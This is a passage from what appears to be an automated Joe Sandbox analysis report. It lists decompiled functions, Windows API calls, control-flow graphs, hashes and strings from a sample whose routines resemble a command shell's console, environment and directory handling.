                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE87CA: InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00F1CA04), ref: 00EE87EE
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE87CA: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00EE87FA
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE87CA: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00EE880E
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE87CA: SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(00F07460,00000001), ref: 00EE881B
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE87CA: _get_osfhandle.MSVCRT ref: 00EE8828
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE87CA: GetConsoleMode.KERNELBASE(00000000), ref: 00EE8830
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE87CA: _get_osfhandle.MSVCRT ref: 00EE883C
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE87CA: GetConsoleMode.KERNELBASE(00000000), ref: 00EE8844
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE87CA: GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00EE886A
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE87CA: GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00EE88A5
                                                                                                                                                                                                                                                                                                                                                      • _setjmp3.MSVCRT ref: 00EFEA5E
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Console$CriticalQuerySectionThread$CommandInfoLineModeOpenOutputVirtual_get_osfhandle_setjmp3$CloseCtrlCurrentEnterHandlerHeapInformationInitializeLanguageLeaveValueexitmemset
                                                                                                                                                                                                                                                                                                                                                      • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System$p~]u
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 4238206819-4263504856
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 122d1bd3aff6c2438c2fd6eeef7159fef960f4a11a5c3bbead82b2cf4e8bc466
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 0b88d9961b1d58ece19d2d2b6359885bbfd668f9e58888018895a6fdb7e1377a
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 122d1bd3aff6c2438c2fd6eeef7159fef960f4a11a5c3bbead82b2cf4e8bc466
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B71D77160070DEFEB21AF719C469BE7AE9FF04344B146429F702F12A2EB35D841AB61
                                                                                                                                                                                                                                                                                                                                                      Function 00EF00E9 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 169COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                                                                      control_flow_graph 371 ef00e9-ef0140 memset call eee3f0 374 ef0146-ef014b 371->374 375 efe615-efe61d call ef1e70 371->375 376 efe627 374->376 377 ef0151-ef016a GetModuleFileNameW call eeec2e 374->377 381 efe61f-efe621 exit 375->381 382 efe632-efe63e call eea976 376->382 377->382 385 ef0170-ef017e call eeec2e 377->385 381->376 389 efe643-efe64f call eea976 382->389 385->389 390 ef0184-ef0192 call eeec2e 385->390 396 efe654-efe660 call eea976 389->396 395 ef0198-ef01a4 call eeec2e 390->395 390->396 401 ef01aa-ef01b6 call eeec2e 395->401 402 efe665-efe66a 395->402 396->402 409 ef01bc-ef01c4 401->409 410 efe714-efe724 _wcsicmp 401->410 403 efe66c 402->403 404 efe672-efe67c call eea62f 402->404 403->404 411 efe67e-efe691 _wcsupr 404->411 412 efe6f8-efe6fd 404->412 413 ef01ee-ef01f3 409->413 414 ef01c6-ef01d8 call ee8bc7 409->414 410->409 415 efe72a-efe734 410->415 416 efe699 411->416 417 efe693 411->417 418 efe6ff 412->418 419 efe705-efe70f call eea976 412->419 413->414 425 ef01da-ef01e1 ??_V@YAXPAX@Z 414->425 426 ef01e2-ef01ed call ef6b30 414->426 415->409 421 efe69c-efe6a5 416->421 417->416 418->419 419->410 421->421 424 efe6a7-efe6b0 421->424 428 efe6ba-efe6ce call ef01f5 424->428 429 efe6b2-efe6b8 424->429 425->426 434 efe6e1-efe6e3 428->434 435 efe6d0-efe6d2 428->435 429->428 436 efe6eb 434->436 437 efe6e5 434->437 438 efe6da-efe6df 435->438 439 efe6d4 435->439 440 efe6f0-efe6f3 call eefc40 436->440 437->436 438->440 439->438 440->412
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00EF011A
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
                                                                                                                                                                                                                                                                                                                                                      • GetModuleFileNameW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,?,?,-00000001,?,?,00000000), ref: 00EF0156
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEEC2E: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00F0E590,00002000,?,00F28BF0,00000000,?,?,00EE8F0D), ref: 00EEEC51
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEEC2E: _wcsicmp.MSVCRT ref: 00EEEC77
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEEC2E: _wcsicmp.MSVCRT ref: 00EEEC8D
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEEC2E: _wcsicmp.MSVCRT ref: 00EEECA3
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEEC2E: _wcsicmp.MSVCRT ref: 00EEECB9
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEEC2E: _wcsicmp.MSVCRT ref: 00EEECCF
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEEC2E: _wcsicmp.MSVCRT ref: 00EEECE5
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEEC2E: _wcsicmp.MSVCRT ref: 00EEECF7
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEEC2E: _wcsicmp.MSVCRT ref: 00EEED0D
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00EF01DB
                                                                                                                                                                                                                                                                                                                                                      • exit.MSVCRT ref: 00EFE621
                                                                                                                                                                                                                                                                                                                                                      • _wcsupr.MSVCRT ref: 00EFE683
                                                                                                                                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00EFE71A
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: _wcsicmp$memset$EnvironmentFileModuleNameVariable_wcsuprexit
                                                                                                                                                                                                                                                                                                                                                      • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2336066422-4197029667
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: aa00f22d25eb973634231fa5679a45115e05bd7a12f5f4c4124479703c86915d
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 4e8a1ab7c5346d35a7bd169f14e2d6087d59985fe1f91e108acec8f5de77c5c8
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aa00f22d25eb973634231fa5679a45115e05bd7a12f5f4c4124479703c86915d
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C651E930B0025E4BDF28DB628C555BE73A59FA4308F15646DEA06F7391EF70EE418791
                                                                                                                                                                                                                                                                                                                                                      Function 00EE8BC7 Relevance: 24.3, APIs: 16, Instructions: 312COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                                                                      control_flow_graph 442 ee8bc7-ee8be4 call ef7d90 445 ee8bea-ee8c16 call ef5a2e call eee3f0 442->445 446 efb5d4-efb5d8 442->446 453 ee8c1c-ee8c2d call eeacb0 445->453 454 efb774-efb77a call ef61e6 445->454 446->445 448 efb5de-efb5e3 446->448 450 ee8e67-ee8e76 448->450 453->454 460 ee8c33-ee8c3a 453->460 457 efb77f 454->457 459 efb781 457->459 461 ee8c3d-ee8c46 460->461 461->461 462 ee8c48-ee8c4c 461->462 463 ee8c4f-ee8c59 462->463 464 ee8c5b-ee8c60 463->464 465 ee8c66-ee8c70 463->465 464->465 466 efb5e8-efb5eb 464->466 467 ee8c76-ee8c85 GetCurrentDirectoryW 465->467 468 efb5f0 465->468 466->463 469 efb5fb 467->469 470 ee8c8b-ee8cb0 towupper iswalpha 467->470 468->469 472 efb606 469->472 471 ee8cb6-ee8cba 470->471 470->472 471->472 473 ee8cc0-ee8cde towupper 471->473 474 efb60f 472->474 473->474 475 ee8ce4-ee8cf8 GetFullPathNameW 473->475 477 efb61a-efb622 GetLastError 474->477 476 ee8cfe-ee8d01 475->476 475->477 479 efb64c-efb66a call ef61e6 _local_unwind4 476->479 480 ee8d07-ee8d0e 476->480 478 efb627-efb647 call ef61e6 _local_unwind4 477->478 484 efb674 479->484 483 ee8d14-ee8d19 480->483 480->484 487 ee8d1f-ee8d23 483->487 488 efb747-efb767 call ef61e6 _local_unwind4 483->488 490 efb67f 484->490 487->490 491 ee8d29-ee8d2d 487->491 488->459 495 efb68a 490->495 491->488 493 ee8d33-ee8d37 491->493 494 ee8d3d 493->494 493->495 496 ee8d40-ee8d4a 494->496 497 efb695 495->497 496->496 498 ee8d4c-ee8d52 496->498 501 efb6a0 497->501 498->497 499 ee8d58 498->499 500 ee8d5b-ee8d73 call ef7d82 499->500 505 ee8d75-ee8d7c 500->505 506 ee8d82-ee8d8c 500->506 504 efb6ab-efb6b6 GetLastError 501->504 507 efb6bc-efb6bf 504->507 508 ee8da2-ee8da9 504->508 505->506 509 ee8e77-ee8e7a 505->509 506->501 510 ee8d92-ee8d9c GetFileAttributesW 506->510 507->508 511 efb6c5-efb6c8 507->511 512 ee8dab-ee8db0 508->512 513 ee8dc9-ee8dd2 508->513 509->500 510->504 510->508 511->478 514 efb6ce 511->514 515 ee8db6-ee8dbc call ef0207 512->515 516 efb6d3 512->516 517 ee8dfa-ee8dfc 513->517 518 ee8dd4-ee8dd9 513->518 514->508 528 ee8dc1-ee8dc3 515->528 522 efb6de 516->522 519 ee8dfe-ee8e01 517->519 520 ee8e09-ee8e0e 517->520 518->522 523 ee8ddf-ee8de9 GetFileAttributesW 518->523 524 ee8e1f-ee8e24 519->524 525 ee8e03-ee8e07 519->525 526 ee8e87-ee8e8d 520->526 527 ee8e10-ee8e19 SetCurrentDirectoryW 520->527 530 efb6e9-efb6f4 GetLastError 522->530 529 ee8def-ee8df4 523->529 523->530 532 ee8e8f-ee8e95 524->532 533 ee8e26-ee8e30 call eea976 524->533 525->520 525->524 526->527 527->477 527->524 528->479 528->513 529->517 531 efb6ff-efb722 call ef61e6 _local_unwind4 529->531 530->478 534 efb6fa 530->534 531->450 532->533 540 efb727-efb745 call ef61e6 _local_unwind4 533->540 541 ee8e36-ee8e3e 533->541 534->478 540->457 543 ee8e97-ee8e9c 541->543 544 ee8e40-ee8e65 call ee8e9e call ee8e7f call ef61e6 541->544 543->544 544->450
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF5A2E: memset.MSVCRT ref: 00EF5A5A
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
                                                                                                                                                                                                                                                                                                                                                      • GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000,00000000,?,00000104,?), ref: 00EE8C7A
                                                                                                                                                                                                                                                                                                                                                      • towupper.MSVCRT ref: 00EE8C8F
                                                                                                                                                                                                                                                                                                                                                      • iswalpha.MSVCRT ref: 00EE8CA4
                                                                                                                                                                                                                                                                                                                                                      • towupper.MSVCRT ref: 00EE8CC4
                                                                                                                                                                                                                                                                                                                                                      • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?), ref: 00EE8CF0
                                                                                                                                                                                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?), ref: 00EE8D93
                                                                                                                                                                                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?), ref: 00EE8DE0
                                                                                                                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?), ref: 00EE8E11
                                                                                                                                                                                                                                                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00EFB6AB
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: AttributesCurrentDirectoryFilememsettowupper$ErrorFullLastNamePathiswalpha
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1133067188-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 5af1963b6beba125b591cb62de64d514abbc53497e6c102ea88ee0457c76edb2
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 65c95aaeaffa12d3e8da4fbe2c479de2c184f1c85a7672907f9892e00a035f23
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5af1963b6beba125b591cb62de64d514abbc53497e6c102ea88ee0457c76edb2
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 20B1BD31A0015D8BDB28EB65DE45AFDB3B4EF14304F2562A9E51AF31A0EB309E80DA51
                                                                                                                                                                                                                                                                                                                                                      Function 00EEE310 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                                                                      control_flow_graph 552 eee310-eee341 _get_osfhandle SetConsoleMode _get_osfhandle GetConsoleMode 553 eee357-eee370 _get_osfhandle GetConsoleMode 552->553 554 eee343-eee355 552->554 556 eee3bb 553->556 557 eee372-eee37f 553->557 554->553 555 eee3bc-eee3d9 _get_osfhandle SetConsoleMode 554->555 555->553 558 eee3df-efdc17 555->558 559 eee3a0-eee3a9 557->559 560 eee381-eee39a _get_osfhandle SetConsoleMode 557->560 558->553 564 efdc1d-efdc45 _get_osfhandle SetConsoleMode 558->564 562 eee3ba 559->562 563 eee3ab-eee3b8 559->563 560->559 562->556 563->562 564->553
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00EEE318
                                                                                                                                                                                                                                                                                                                                                      • SetConsoleMode.KERNELBASE(00000000), ref: 00EEE322
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00EEE32F
                                                                                                                                                                                                                                                                                                                                                      • GetConsoleMode.KERNELBASE(00000000), ref: 00EEE339
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00EEE35E
                                                                                                                                                                                                                                                                                                                                                      • GetConsoleMode.KERNELBASE(00000000), ref: 00EEE368
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00EEE390
                                                                                                                                                                                                                                                                                                                                                      • SetConsoleMode.KERNELBASE(00000000), ref: 00EEE39A
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00EEE3C7
                                                                                                                                                                                                                                                                                                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00EEE3D1
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00EFDC35
                                                                                                                                                                                                                                                                                                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00EFDC3F
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: ConsoleMode_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                      • String ID: CMD.EXE
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1606018815-3025314500
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 7d26d81b5814d83912faa375838c474749798346bd4e1140dbca70e4f7d43472
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: d486c28a402f3203e02d05bacab0b6ec8d0424d74afb717d0797dffcc7588304
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7d26d81b5814d83912faa375838c474749798346bd4e1140dbca70e4f7d43472
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D721B3B0A0060C9FD7249B74EC5EB9A3626BB00719B088428F507E73B0D7B6D925BF53
                                                                                                                                                                                                                                                                                                                                                      Function 00EE59C0 Relevance: 15.3, APIs: 10, Instructions: 270COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                                                                      control_flow_graph 566 ee59c0-ee59e2 567 ee59f4-ee5a36 memset call eee3f0 566->567 568 ee59e4-ee59ee call ef0b12 566->568 573 ee5a3c-ee5a41 567->573 574 ef9a3a-ef9a3d 567->574 568->567 575 ef9a27-ef9a35 call ee78e4 568->575 576 ef9a3f 573->576 577 ee5a47-ee5a5b GetFullPathNameW 573->577 579 ef9a50 574->579 586 ee5a90-ee5a9e call ef6b30 575->586 580 ef9a4a GetLastError 576->580 577->580 581 ee5a61-ee5a66 577->581 583 ef9a52-ef9a53 579->583 580->579 584 ee5a6c-ee5a78 CreateDirectoryW 581->584 585 ef9a60-ef9a6f call ee78e4 581->585 587 ef9a54-ef9a5a call ee78e4 583->587 589 ee5a7a-ee5a84 584->589 590 ee5aa1-ee5aac GetLastError 584->590 597 ef9a76-ef9a82 call ee78e4 585->597 587->585 594 ee5a8e 589->594 595 ee5a86-ee5a8d ??_V@YAXPAX@Z 589->595 590->597 598 ee5ab2-ee5ab5 590->598 594->586 595->594 605 ef9a8a 597->605 598->583 601 ee5abb-ee5ac2 598->601 603 ee5b8b-ee5b8e 601->603 604 ee5ac8-ee5acf 601->604 603->587 604->605 606 ee5ad5-ee5adf 604->606 610 ef9a95 605->610 607 ee5ae5-ee5ae9 606->607 608 ef9aa0-ef9aa4 606->608 609 ee5aef-ee5af2 607->609 607->610 611 ef9aac-ef9aaf 608->611 612 ef9aa6 608->612 613 ee5b35 609->613 610->608 611->603 614 ef9ab5-ef9ab9 611->614 612->611 615 ee5b3b-ee5b41 613->615 616 ef9abb 614->616 617 ef9ac1-ef9ac5 614->617 619 ee5b68-ee5b6a 615->619 620 ee5b43-ee5b49 615->620 616->617 617->603 618 ef9acb-ef9acf 617->618 621 ef9ad7-ef9ae8 618->621 622 ef9ad1 618->622 625 ee5b6c-ee5b78 CreateDirectoryW 619->625 626 ee5b83-ee5b89 619->626 623 ee5b4b-ee5b5c 620->623 624 ee5af4-ee5af6 620->624 628 ef9aea-ef9af0 621->628 629 ef9b17-ef9b1a 621->629 622->621 623->620 630 ee5b5e-ee5b64 623->630 627 ee5af7-ee5b01 624->627 625->589 631 ee5b7e 625->631 626->625 633 ee5b07-ee5b11 CreateDirectoryW 627->633 634 ef9b71 627->634 635 ef9af1-ef9af6 628->635 636 ef9b1c-ef9b25 629->636 637 ef9b27-ef9b2d 629->637 630->615 638 ee5b66 630->638 632 ef9b7c-ef9b87 GetLastError 631->632 632->589 639 ef9b8d 632->639 640 ee5b13-ee5b1e GetLastError 633->640 641 ee5b20-ee5b32 633->641 634->632 642 ef9b0f-ef9b15 635->642 643 ef9af8-ef9b0d 635->643 636->637 637->619 644 ef9b33-ef9b37 637->644 638->627 639->583 640->603 640->641 641->613 642->629 643->635 643->642 645 ef9b38-ef9b3d 644->645 646 ef9b3f-ef9b54 645->646 647 ef9b56-ef9b61 645->647 646->645 646->647 647->619 648 ef9b67-ef9b6a 647->648 648->634
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00EE5A10
                                                                                                                                                                                                                                                                                                                                                      • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,-00000001), ref: 00EE5A53
                                                                                                                                                                                                                                                                                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000), ref: 00EE5A70
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00EE5A87
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF0B12: GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00EF0B40
                                                                                                                                                                                                                                                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00EE5AA1
                                                                                                                                                                                                                                                                                                                                                      • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 00EE5B09
                                                                                                                                                                                                                                                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00EE5B13
                                                                                                                                                                                                                                                                                                                                                      • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 00EE5B70
                                                                                                                                                                                                                                                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00EF9B7C
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: CreateDirectoryErrorLast$DriveFullNamePathTypememset
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 402963468-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 958997b791a26ecaf0c11caff48bd6693dbefebcc8f212e15548cc86a488dd06
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: bf702e9c7b6239d3241400efdbdbd30dd97fcf0cbaaa646faa630c8483400ba2
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 958997b791a26ecaf0c11caff48bd6693dbefebcc8f212e15548cc86a488dd06
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7991E632A00A5E9BDB34DB669C85BBBB7B4EF88318F1450A9E649F7181F7708D81C750
                                                                                                                                                                                                                                                                                                                                                      Function 00EF6903 Relevance: 10.6, APIs: 7, Instructions: 105sleepCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                                                                      • Not Executed
